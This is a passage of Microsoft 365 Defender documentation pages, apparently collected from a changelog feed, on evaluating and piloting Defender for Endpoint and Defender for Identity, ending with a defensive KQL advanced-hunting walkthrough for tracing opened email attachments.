+**macOS** | [Local scripts](../defender-endpoint/mac-install-manually.md), [Microsoft Endpoint Manager](../defender-endpoint/mac-install-with-intune.md), [JAMF Pro](../defender-endpoint/mac-install-with-jamf.md), [Mobile Device Management](../defender-endpoint/mac-install-with-other-mdm.md)
+**Linux Server** | [Local script](../defender-endpoint/linux-install-manually.md), [Puppet](../defender-endpoint/linux-install-with-puppet.md), [Ansible](../defender-endpoint/linux-install-with-ansible.md)
+**iOS** | [App-based](../defender-endpoint/ios-install.md)
+**Android** | [Microsoft Endpoint Manager](../defender-endpoint/android-intune.md)
+++
+## Next step
+[Setup the pilot for Microsoft Defender for Endpoint](eval-defender-endpoint-pilot.md)
+
+Return to the overview for [Evaluate Microsoft Defender for Endpoint](eval-defender-endpoint-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
security Eval Defender Endpoint Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-endpoint-overview.md
+
+ Title: Evaluate Microsoft Defender for Endpoint overview, including reviewing the architecture, enabling or activating the evaluation environment, and building a pilot.
+description: Steps for the set up for a Microsoft 365 Defender trial lab or pilot environment. Test and experience how the security solution is designed to protect devices, identity, data, and apps in your organization.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Evaluate Microsoft Defender for Endpoint overview
+
+**Applies to:**
+
+- Microsoft 365 Defender
++
+This article outlines the process to enable and pilot Microsoft Defender for Endpoint. Before starting this process, be sure you've reviewed the overall process for [evaluating Microsoft 365 Defender](eval-overview.md) and you have [created the Microsoft 365 Defender evaluation environment](eval-create-eval-environment.md).
+<br>
+
+Use the following steps to enable and pilot Microsoft Defender for Endpoint.
+
+![Steps for adding Microsoft Defender for Endpoint to the Defender evaluation environment](../../media/defender/m365-defender-endpoint-eval-steps.png)
++
+The following table describes the steps in the illustration.
+
+ |Step |Description
+|||
+| [Step 1. Review architecture requirements and key concepts](eval-defender-endpoint-architecture.md) | Understand the Defender for Endpoint architecture and the capabilities available to you. |
+|[Step 2. Enable the evaluation environment](eval-defender-office-365-enable-eval.md) | Follow the steps to setup the evaluation environment. |
+|[Step 3. Set up the pilot ](eval-defender-office-365-pilot.md) | Verify your pilot group, run simulations, and become familiar with key features and dashboards. |
++
security Eval Defender Endpoint Pilot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-endpoint-pilot.md
+
+ Title: Pilot Microsoft Defender for Endpoint, set up a pilot, test capabilities in evaluation
+description: Learn how to run a pilot for Microsoft Defender for Endpoint(MDE), including verifying the pilot group and trying out capabilities.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Pilot Microsoft Defender for Endpoint
+
+This article will guide you in the process of running a pilot for Microsoft Defender for Endpoint.
+
+Use the following steps to setup and configure the pilot for Microsoft Defender for Endpoint.
+
+![Steps for adding Microsoft Defender for Identity to the Defender evaluation environment](../../media/defender/m365-defender-endpoint-pilot-steps.png)
+
+- Step 1. Verify pilot group
+- Step 2. Try out capabilities
+
+When you pilot Microsoft Defender for Endpoint, you may choose to onboard a few devices to the service before onboarding your entire organization.
+
+You can then try out capabilities that are available such as running attack simulations and seeing how Defender for Endpoint surfaces malicious activities and enables you to conduct an efficient response.
+
+## Step 1. Verify pilot group
+After completing the onboarding steps outlined in the [Enable evaluation](eval-defender-endpoint-enable-eval.md) section, you should see the devices in the Device inventory list approximately after an hour.
+
+When you see your onboarded devices you can then proceed with trying out capabilities.
+
+## Step 2. Try out capabilities
+Now that you've completed onboarding some devices and verified that they are reporting to the service, familiarize yourself with the product by trying out the powerful capabilities that are available right out of the box.
+
+During the pilot, you can easily get started with trying out some of the features to see the product in action without going through complex configuration steps.
+
+Let's start by checking out the dashboards.
+
+### View the device inventory
+The device inventory is where you'll see the list of endpoints, network devices, and IoT devices in your network. Not only does it provide you with a view of the devices in your network, but it also gives your in-depth information about them such as domain, risk level, OS platform, and other details for easy identification of devices most at risk.
+
+### View the Threat and vulnerability management dashboard
+Threat and vulnerability management helps you focus on the weaknesses that pose the most urgent and the highest risk to the organization. From the dashboard, get a high-level view of the organization exposure score, Microsoft Secure Score for Devices, device exposure distribution, top security recommendations, top vulnerable software, top remediation activities, and top exposed device data.
+
+### Run a simulation
+Microsoft Defender for Endpoint comes with ["Do It Yourself" attack scenarios](https://securitycenter.windows.com/tutorials) that you can run on your pilot devices. Each document includes OS and application requirements as well as detailed instructions that are specific to an attack scenario. These scripts are safe, documented, and easy to use. These scenarios will reflect Defender for Endpoint capabilities and walk you through investigation experience.
+
+To run any of the provided simulations, you need at least [one onboarded device](../defender-endpoint/onboard-configure.md).
+
+1. In **Help** > **Simulations & tutorials**, select which of the available attack scenarios you would like to simulate:
+
+ - **Scenario 1: Document drops backdoor** - simulates delivery of a socially engineered lure document. The document launches a specially crafted backdoor that gives attackers control.
+
+ - **Scenario 2: PowerShell script in fileless attack** - simulates a fileless attack that relies on PowerShell, showcasing attack surface reduction and device learning detection of malicious memory activity.
+
+ - **Scenario 3: Automated incident response** - triggers automated investigation, which automatically hunts for and remediates breach artifacts to scale your incident response capacity.
+
+2. Download and read the corresponding walkthrough document provided with your selected scenario.
+
+3. Download the simulation file or copy the simulation script by navigating to **Help** > **Simulations & tutorials**. You can choose to download the file or script on the test device but it's not mandatory.
+
+4. Run the simulation file or script on the test device as instructed in the walkthrough document.
+
+> [!NOTE]
+> Simulation files or scripts mimic attack activity but are actually benign and will not harm or compromise the test device.
+
+## Next steps
+[Evaluate Microsoft Cloud App Security](eval-defender-mcas-overview.md)
+
+Return to the overview for [Evaluate Microsoft Defender for Endpoint](eval-defender-endpoint-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
security Eval Defender Identity Architecture https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-identity-architecture.md
+
+ Title: Review architecture requirements and the technical framework for Microsoft Defender for Identity, architecture diagram, MDI
+description: The technical diagram for Microsoft Defender for Identity in Microsoft 365 Defender will help you understand identity in Microsoft 365 before you build your trial lab or pilot environment.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Review architecture requirements and key concepts for Microsoft Defender for Identity
++
+**Applies to:**
+- Microsoft 365 Defender
+
+This article is [Step 1 of 3](eval-defender-identity-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Identity. For more information about this process, see the [overview article](eval-defender-identity-overview.md).
+
+Before enabling Microsoft Defender for Identity, be sure you understand the architecture and can meet the requirements.
+
+Microsoft Defender for Identity uses machine learning and behavioral analytics to identify attacks across your on-premises network along with detecting and proactively preventing user sign-in risks associated with cloud identities. For more information, see [What is Microsoft Defender for Identity?](/defender-for-identity/what-is)
+
+Defender for Identity protects your on-premises Active Directory users and/or users synced to your Azure Active Directory (Azure AD). To protect an environment made up of only Azure AD users, see [Azure AD Identity Protection](/azure/active-directory/identity-protection/overview-identity-protection).
+
+## Understand the architecture
+
+The following diagram illustrates the baseline architecture for Defender for Identity.
+
+![Architecture for Microsoft Defender for Identity](../../media/defender/m365-defender-identity-architecture.png)
+
+In this illustration:
+- Sensors installed on AD domain controllers parse logs and network traffic and send them to Microsoft Defender for Identity for analysis and reporting.
+- Sensors can also parse Active Directory Federation Services (AD FS) when Azure AD is configured to use federated authentication (dotted line in illustration).
+- Microsoft Defender for Identity shares signals to Microsoft 365 Defender for extended detection and response (XDR).
++
+Defender for Identity sensors can be directly installed on the following servers:
+
+- Domain controllers: The sensor directly monitors domain controller traffic, without the need for a dedicated server, or configuration of port mirroring.
+- AD FS: The sensor directly monitors network traffic and authentication events.
+
+For a deeper look into the architecture of Defender for Identity, including integration with Cloud App Security, see [Microsoft Defender for Identity architecture](/defender-for-identity/architecture).
++
+## Understand key concepts
+
+The following table identified key concepts that are important to understand when evaluating, configuring, and deploying Microsoft Defender for Identity.
++
+|Concept |Description |More information |
+||||
+| Monitored activities | Defender for Identity monitors signals generated from within your organization to detect suspicious or malicious activity and helps you determine the validity of each potential threat so that you can effectively triage and respond. | [Microsoft Defender for Identity monitored activities](/defender-for-identity/monitored-activities) |
+| Security alerts | Defender for Identity security alerts explain the suspicious activities detected by sensors on your network along with the actors and computers involved in each threat. | [Microsoft Defender for Identity Security Alerts](/defender-for-identity/suspicious-activity-guide?tabs=external) |
+| Entity profiles | Entity profiles provide a comprehensive deep-dive investigation of users, computers, devices, and resources along with their access history. | [Understanding entity profiles](/defender-for-identity/entity-profiles) |
+| Lateral movement paths | A key component of MDI security insights is identifying lateral movement paths in which an attacker uses non-sensitive accounts to gain access to sensitive accounts or machines throughout your network. | [Microsoft Defender for Identity Lateral Movement Paths (LMPs)](/defender-for-identity/use-case-lateral-movement-path) |
+| Network Name Resolution | Network Name Resolution (NNR) is a component of MDI functionality which captures activities based on network traffic, Windows events, ETW, etc. and correlates this raw data to the relevant computers involved in each activity. | [What is Network Name Resolution?](/defender-for-identity/nnr-policy) |
+| Reports | Defender for Identity reports allow you to schedule or immediately generate and download reports that provide system and entity status information. You can create reports about system health, security alerts, and potential lateral movement paths detected in your environment. | [Microsoft Defender for Identity Reports ](/defender-for-identity/reports) |
+| Role groups | Defender for Identity offers role-based groups and delegated access to safeguard data according to your organization's specific security and compliance needs which includes Administrators, Users and Viewers. | [Microsoft Defender for Identity role groups](/defender-for-identity/role-groups) |
+| Administrative portal | In addition to the Microsoft 365 Security Center, the Defender for Identity portal cab be used to monitor and respond to suspicious activity. | [Working with the Microsoft Defender for Identity portal](/defender-for-identity/workspace-portal) |
+| Microsoft Cloud App Security integration | Microsoft Cloud App Security integrates with Microsoft Defender for Identity to provide user entity behavioral analytics (UEBA) across a hybrid environment - both cloud app and on-premises | Microsoft Defender for Identity integration |
+| | | |
++
+## Review prerequisites
+
+Defender for Identity requires some prerequisite work to ensure that your on-premises identity and networking components meet minimum requirements. Use this article as a checklist to ensure your environment is ready: [Microsoft Defender for Identity prerequisites](/defender-for-identity/prerequisites).
++
+## Next steps
+
+Step 2 of 3: [Enable the evaluation environment Defender for Identity](eval-defender-identity-enable-eval.md)
+
+Return to the overview for [Evaluate Microsoft Defender for Identity](eval-defender-identity-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
security Eval Defender Identity Enable Eval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-identity-enable-eval.md
+
+ Title: Enable the evaluation environment for Microsoft Defender for Identity, set up the MDI instance, install and configure MDI sensor, let MDI sensor detect local admins
+description: Set up Microsoft Defender for Identity in Microsoft 365 Defender trial lab or pilot environment by installing & configuring the sensor, and discovering local admins on other computers.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Enable the evaluation environment for Microsoft Defender for Identity
+
+**Applies to:**
+- Microsoft 365 Defender
+
+This article is [Step 2 of 2](eval-defender-identity-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Identity. For more information about this process, see the [overview article](eval-defender-identity-overview.md).
+
+Use the following steps to set up your Microsoft Defender for Identity environment.
+
+![Steps to enable Microsoft Defender for Identity in the Microsoft Defender evaluation environment](../../media/defender/m365-defender-identity-eval-enable-steps.png)
+
+- [Step 1. Set up the Defender for Identity Instance](#step-1-set-up-the-defender-for-identity-instance)
+- [Step 2. Install and configure the sensor](#step-2-install-and-configure-the-sensor)
+- [Step 3. Configure event log and proxy settings on machines with the sensor](#step-3-configure-event-log-and-proxy-settings-on-machines-with-the-sensor)
+- [Step 4. Allow Defender for Identity to identify local admins on other computers](#step-4-allow-defender-for-identity-to-identify-local-admins-on-other-computers)
+
+## Step 1. Set up the Defender for Identity Instance
+
+Sign in to the Defender for Identity portal to create your instance and then connect this instance to your Active Directory environment.
+
+| |Step |More information |
+||||
+|1 | Create the Defender for Identity instance | [Quickstart: Create your Microsoft Defender for Identity instance](/defender-for-identity/install-step1) |
+|2 | Connect the Defender for Identity instance to your Active Directory forest | [Quickstart: Connect to your Active Directory Forest](/defender-for-identity/install-step2) |
+| | |
+
+## Step 2. Install and configure the sensor
+
+Next, download, install, and configure the Defender for Identity sensor on the domain controllers and AD FS servers in your on-premises environment.
+
+| |Step |More information |
+||||
+|1 | Determine how many Microsoft Defender for Identity sensors you need. | [Plan capacity for Microsoft Defender for Identity](/defender-for-identity/capacity-planning) |
+|2 | Download the sensor setup package | [Quickstart: Download the Microsoft Defender for Identity sensor setup package](/defender-for-identity/install-step3) |
+|3 | Install the Defender for Identity sensor | [Quickstart: Install the Microsoft Defender for Identity sensor](/defender-for-identity/install-step4) |
+|4 | Configure the sensor | [Configure Microsoft Defender for Identity sensor settings ](/defender-for-identity/install-step5) |
+| | | |
+
+## Step 3. Configure event log and proxy settings on machines with the sensor
+
+On the machines that you installed the sensor on, configure Windows event log collection and Internet proxy settings to enable and enhance detection capabilities.
+
+| |Step |More information |
+||||
+|1 | Configure Windows event log collection | [Configure Windows Event collection](/defender-for-identity/configure-windows-event-collection) |
+|2 | Configure Internet proxy settings | [Configure endpoint proxy and Internet connectivity settings for your Microsoft Defender for Identity Sensor](/defender-for-identity/configure-proxy) |
+| | | |
+
+## Step 4. Allow Defender for Identity to identify local admins on other computers
+
+Microsoft Defender for Identity lateral movement path detection relies on queries that identify local admins on specific machines. These queries are performed with the SAM-R protocol, using the Defender for Identity Service account.
+
+To ensure Windows clients and servers allow your Defender for Identity account to perform SAM-R, a modification to Group Policy must be made to add the Defender for Identity service account in addition to the configured accounts listed in the Network access policy. Make sure to apply group policies to all computers **except domain controllers**.
+
+For instructions on how to do this, see [Configure Microsoft Defender for Identity to make remote calls to SAM](/defender-for-identity/install-step8-samr).
+
+## Next steps
+
+Step 3 of 3: [Pilot Microsoft Defender for Identity](eval-defender-identity-pilot.md)
+
+Return to the overview for [Evaluate Microsoft Defender for Identity](eval-defender-identity-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
security Eval Defender Identity Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-identity-overview.md
+
+ Title: Evaluate Microsoft 365 Defender for Identity overview, set up evaluation, eval and pilot
+description: Steps for the evaluation of Microsoft 365 Defender for Identity including requirements, enabling or activating the eval, and set up of the pilot or test.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Evaluate Microsoft Defender for Identity overview
++
+**Applies to:**
+- Microsoft 365 Defender
+
+This article outlines the process to enable and pilot Microsoft Defender for Identity. Before starting this process, be sure you've reviewed the overall process for [evaluating Microsoft 365 Defender](eval-overview.md) and you have [created the Microsoft 365 Defender evaluation environment](eval-create-eval-environment.md).
+<br>
+
+Use the following steps to enable and pilot Microsoft Defender for Identity.
+
+![Steps for adding Microsoft Defender for Identity to the Defender evaluation environment](../../media/defender/m365-defender-identity-eval-steps.png)
+
+The following table describes the steps in the illustration.
+
+| |Step |Description |
+||||
+|1|[Review architecture requirements and key concepts](eval-defender-identity-architecture.md) | Understand the Defender for Identity architecture and be sure your environment meets the architecture prerequisites. |
+|2|[Enable the evaluation environment](eval-defender-identity-enable-eval.md) | Follow the steps to set up the evaluation environment. |
+|3|[Set up the pilot](eval-defender-identity-pilot.md) | Learn about benchmark settings for your identity environment and try out Defender for Identity tutorials. |
+||||
+
security Eval Defender Identity Pilot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-identity-pilot.md
+
+ Title: Pilot Microsoft Defender for Identity, set up configuration benchmarks, standards, guidelines, and take tutorials about detecting, and remediating various Identity threats like reconnaissance, compromised credential, lateral movement, domain dominance, and exfiltration alerts, conduct user, computer, entity, and lateral movement paths investigation.
+description: Pilot Microsoft Defender for Identity, set benchmarks, take tutorials on reconnaissance, compromised credential, lateral movement, domain dominance, and exfiltration alerts, among others.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Pilot Microsoft Defender for Identity
++
+**Applies to:**
+- Microsoft 365 Defender
+
+This article is [Step 3 of 3](eval-defender-identity-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Identity. For more information about this process, see the [overview article](eval-defender-identity-overview.md).
+
+Use the following steps to setup and configure the pilot for Microsoft Defender for identity. Note that the recommendations don't include setting up a pilot group. The best practice is to go ahead and install the sensor on all of your servers running Active Directory Domain Services (AD DS) and Active Directory Federated Services (AD FS).
+
+![Steps for adding Microsoft Defender for Identity to the Defender evaluation environment](../../media/defender/m365-defender-identity-pilot-steps.png)
+
+The following table describes the steps in the illustration.
+
+- [Step 1: Configure benchmark recommendations for your identity environment](#step-1-configure-benchmark-recommendations-for-your-identity-environment)
+- [Step 2: Try out capabilities ΓÇö Walk through tutorials for identifying and remediating different attack types ](#step-2-try-out-capabilities--walk-through-tutorials-for-identifying-and-remediating-different-attack-types)
+
+## Step 1. Configure benchmark recommendations for your identity environment
+
+Microsoft provides security benchmark recommendations for customers using Microsoft Cloud services. The [Azure Security Benchmark](/security/benchmark/azure/overview) (ASB) provides prescriptive best practices and recommendations to help improve the security of workloads, data, and services on Azure.
+
+These benchmark recommendations include [Azure security baseline for Microsoft Defender for Identity](/security/benchmark/azure/baselines/defender-for-identity-security-baseline). Implementing these recommendations can take some time to plan and implement. While these will greatly increase the security of your identity environment, they shouldn't prevent you from continuing to evaluate and implement Microsoft Defender for Identity. These are provided here for your awareness.
+
+## Step 2. Try out capabilities ΓÇö Walk through tutorials for identifying and remediating different attack types
+
+The Microsoft Defender for Identity documentation includes a series of tutorials that walk through the process of identifying and remediating various attack types.
+
+Try out Defender for Identity tutorials:
+- [Reconnaissance alerts](/defender-for-identity/reconnaissance-alerts)
+- [Compromised credential alerts](/defender-for-identity/compromised-credentials-alerts)
+- [Lateral movement alerts](/defender-for-identity/lateral-movement-alerts)
+- [Domain dominance alerts](/defender-for-identity/domain-dominance-alerts)
+- [Exfiltration alerts](/defender-for-identity/exfiltration-alerts)
+- [Investigate a user](/defender-for-identity/investigate-a-user)
+- [Investigate a computer](/defender-for-identity/investigate-a-computer)
+- [Investigate lateral movement paths](/defender-for-identity/investigate-lateral-movement-path)
+- [Investigate entities](/defender-for-identity/investigate-entity)
+
+## Next steps
+
+[Evaluate Microsoft Defender for Office 365](eval-defender-office-365-overview.md)
+
+Return to the overview for [Evaluate Microsoft Defender for Office 365](eval-defender-office-365-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
security Eval Defender Investigate Respond Additional https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-investigate-respond-additional.md
+
+ Title: Try Microsoft 365 Defender incident response capabilities in a pilot environment, to prioritize and manage incidents, configure automated investigation and response, and use advanced hunting
+description: Try incident response capabilities in Microsoft 365 Defender to prioritize and manage incidents, automate investigations, and use advanced hunting in threat detection.
+keywords: Microsoft 365 Defender trial, try Microsoft 365 Defender, evaluate Microsoft 365 Defender, Microsoft 365 Defender evaluation lab, Microsoft 365 Defender pilot, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
+localization_priority: Normal
++ Last updated : 07/09/2021+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Try Microsoft 365 Defender incident response capabilities in a pilot environment
+
+**Applies to:**
+- Microsoft 365 Defender
+
+This article is [Step 2 of 2](eval-defender-investigate-respond.md) in the process of performing an investigation and response of an incident in Microsoft 365 Defender using a pilot environment. For more information about this process, see the [overview](eval-defender-investigate-respond.md) article.
+
+Once you have performed an [incident response for a simulated attack](eval-defender-investigate-respond-simulate-attack.md), here are some Microsoft 365 Defender capabilities to explore:
+
+|Capability |Description |
+|:-|:--|
+| [Prioritize incidents](#prioritize-incidents) | Use filtering and sorting of the incidents queue to determine which incidents to address next. |
+| [Manage incidents](#manage-incidents) | Modify incident properties to ensure correct assignment, add tags and comments, and to resolve an incident. |
+| [Automated investigation and response](#examine-automated-investigation-and-response-with-the-action-center) | Automated investigation and response (AIR) capabilities that can help your security operations team address threats more efficiently and effectively. The Action center is a "single pane of glass" experience for incident and alert tasks such as approving pending remediation actions. |
+| [Advanced hunting](#advanced-hunting) | A query-based threat-hunting tool that lets you proactively inspect events in your network and locate threat indicators and entities. You also use advanced hunting during the investigation and remediation of an incident. |
+||||
+
+## Prioritize incidents
+
+You get to the incident queue from **Incidents & alerts > Incidents** on the quick launch of the Microsoft 365 Defender portal ([security.microsoft.com](https://security.microsoft.com)). Here's an example.
++
+The **Most recent incidents and alerts** section shows a graph of the number of alerts received and incidents created in the last 24 hours.
+
+To examine the list of incidents and prioritize their importance for assignment and investigation, you can:
+
+- Configure customizable columns (select **Choose columns**) to give you visibility into different characteristics of the incident or the impacted entities. This helps you make an informed decision regarding the prioritization of incidents for analysis.
+
+- Use filtering to focus on a specific scenario or threat. Applying filters on the incident queue can help determine which incidents require immediate attention.
+
+From the default incident queue, select **Filters** to see a **Filters** pane, from which you can specify a specific set of incidents. Here is an example.
++
+For more information, see [Prioritize incidents](incident-queue.md).
+
+## Manage incidents
+
+You can manage incidents from the **Manage incident** pane for an incident. Here's an example.
++
+You can display this pane from the **Manage incident** link on the:
+
+- Properties pane of an incident in the incident queue.
+- **Summary** page of an incident.
+
+Here are the ways you can manage your incidents:
+
+- Edit the incident name
+
+ Change the utomatically assigned name based on your security team best practices.
+
+- Add incident tags
+
+ Add tags that your security team uses to classify incidents, which can be later filtered.
+
+- Assign the incident to yourself
+
+ Assign it to your user account name, which can be later filtered.
+
+- Resolve an incident
+
+ Close the incident after it has been remediated.
+
+- Set its classification and determination
+
+ Classify and select the threat type when you resolve an incident.
+
+- Add comments
+
+ Use comments for progress, notes, or other information based on your security team best practices. The full comment history is available from the **Comments and history** option in the details page of an incident.
+
+For more information, see [Manage incidents](manage-incidents.md).
+
+## Examine automated investigation and response with the Action center
+
+Depending on how automated investigation and response capabilities are configured for your organization, remediation actions are taken automatically or only upon approval by your security operations team. All actions, whether pending or completed, are listed in the [Action center](m365d-action-center.md), which lists pending and completed remediation actions for your devices, email & collaboration content, and identities in one location.
+
+Here's an example.
++
+From the Action center, you can select pending actions and then approve or reject them in the flyout pane. Here's an example.
++
+Approve (or reject) pending actions as soon as possible so that your automated investigations can proceed and complete in a timely manner.
+
+For more information, see [Automated investigation and response](m365d-autoir.md) and [Action center](m365d-action-center.md).
+
+## Advanced hunting
+
+> [!NOTE]
+> Before we walk you through the advanced hunting simulation, watch the following video to understand advanced hunting concepts, see where you can find it in the portal, and know how it can help you in your security operations.
+
+<br>
+
+> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bp7O]
++
+If the [optional fileless PowerShell attack simulation](eval-defender-investigate-respond-simulate-attack.md#simulate-an-attack-with-an-isolated-domain-controller-and-client-device-optional) were a real attack that had already reached the credential access stage, you can use advanced hunting at any point in the investigation to proactively search through events and records in the network using what you already know from the generated alerts and affected entities. For instance, you can query for any connections to the external IP address in the past 30 days.
+
+### Hunting environment requirements
+
+There's a single internal mailbox and device required for this simulation. You'll also need an external email account to send the test message.
+
+1. Verify that your tenant has [enabled Microsoft 365 Defender](m365d-enable.md#confirm-that-the-service-is-on).
+2. Identify a target mailbox to be used for receiving email.
+
+ - This mailbox must be monitored by Microsoft Defender for Office 365
+
+ - The device from requirement 3 needs to access this mailbox
+
+3. Configure a test device:
+
+ a. Make sure you are using Windows 10 version 1903 or later version.
+
+ b. Join the test device to the test domain.
+
+ c. [Turn on Windows Defender Antivirus](/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features). If you are having trouble enabling Windows Defender Antivirus, see [this troubleshooting topic](/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-windows-defender-antivirus-is-not-disabled-by-a-policy).
+
+ d. [Onboard to Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
+
+### Run the simulation
+
+1. From an external email account, send an email to the mailbox identified in step 2 of the hunting environment requirements section. Include an attachment that will be allowed through any existing email filter policies. This file does not need to be malicious or an executable. Suggested file types are <i>.pdf</i>, <i>.exe</i> (if allowed), or an Office document type such as a Word file.
+
+2. Open the sent email from the device configured as defined in step 3 of the hunting environment requirements section. Either open the attachment or save the file to the device.
+
+#### Go hunting
+
+1. Open the [Microsoft 365 Defender portal](https://security.microsoft.com/).
+
+2. From the navigation pane, select **Hunting > Advanced hunting**.
+
+3. Build a query that starts by gathering email events.
+
+ 1. Select **Query > New**.
+
+ 1. In the **Email** groups under **Advanced hunting**, double-click **EmailEvents**. You should see this in the query window.
+
+ ```console
+ EmailEvents
+ ```
+
+ 1. Change the time frame of the query to the last 24 hours. Assuming the email you sent when you ran the simulation above was in the past 24 hours, otherwise change the time frame as needed.
+
+ 1. Select **Run query**. You may have differing results depending on your pilot environment.
+
+ > [!NOTE]
+ > See the next step for filtering options to limit data return.
+
+ ![Example of the advanced hunting query results](../../media/mtp/fig19.png)
+
+ > [!NOTE]
+ > Advanced hunting displays query results as tabular data. You can also opt to view the data in other format types such as charts.
+
+ 1. Look at the results and see if you can identify the email you opened. It may take up to two hours for the message to show up in advanced hunting. To narrow down the results, you can add the **where** condition to your query to only look for emails that have "yahoo.com" as their SenderMailFromDomain. Here is an example.
+
+ ```console
+ EmailEvents
+ | where SenderMailFromDomain == "yahoo.com"
+ ```
+
+ 1. Click the resulting rows from the query so you can inspect the record.
+
+ ![Example of the inspect record side panel which opens up when an advanced hunting result is selected](../../media/mtp/fig21.png)
+
+4. Now that you have verified that you can see the email, add a filter for the attachments. Focus on all emails with attachments in the environment. For this simulation, focus on inbound emails, not those that are being sent out from your environment. Remove any filters you have added to locate your message and add "| where **AttachmentCount > 0** and **EmailDirection** == **"Inbound""**
+
+ The following query will show you the result with a shorter list than your initial query for all email events:
+
+ ```console
+ EmailEvents
+ | where AttachmentCount > 0 and EmailDirection == "Inbound"
+ ```
+
+5. Next, include the information about the attachment (such as: file name, hashes) to your result set. To do so, join the **EmailAttachmentInfo** table. The common fields to use for joining, in this case are **NetworkMessageId** and **RecipientObjectId**.
+
+ The following query also includes an additional line "| **project-rename EmailTimestamp=Timestamp**" that'll help identify which timestamp was related to the email versus timestamps related to file actions that you'll add in the next step.
+
+ ```console
+ EmailEvents
+ | where AttachmentCount > 0 and EmailDirection == "Inbound"
+ | project-rename EmailTimestamp=Timestamp
+ | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
+ ```
+
+6. Next, use the **SHA256** value from the **EmailAttachmentInfo** table to find **DeviceFileEvents** (file actions that happened on the endpoint) for that hash. The common field here will be the SHA256 hash for the attachment.
+
+ The resulting table now includes details from the endpoint (Microsoft Defender for Endpoint) such as device name, what action was done (in this case, filtered to only include FileCreated events), and where the file was stored. The account name associated with the process will also be included.
+
+ ```console
+ EmailEvents
+ | where AttachmentCount > 0 and EmailDirection == "Inbound"
+ | project-rename EmailTimestamp=Timestamp
+ | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
+ | join DeviceFileEvents on SHA256
+ | where ActionType == "FileCreated"
+ ```
+
+ You've now created a query that'll identify all inbound emails where the user opened or saved the attachment. You can also refine this query to filter for specific sender domains, file sizes, file types, and so on.
+
+7. Functions are a special kind of join, which let you pull more TI data about a file like its prevalence, signer and issuer info, etc. To get more details on the file, use the **FileProfile()** function enrichment:
+
+ ```console
+ EmailEvents
+ | where AttachmentCount > 0 and EmailDirection == "Inbound"
+ | project-rename EmailTimestamp=Timestamp
+ | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
+ | join DeviceFileEvents on SHA256
+ | where ActionType == "FileCreated"
+ | distinct SHA1
+ | invoke FileProfile()
+ ```
+
+#### Create a detection
+
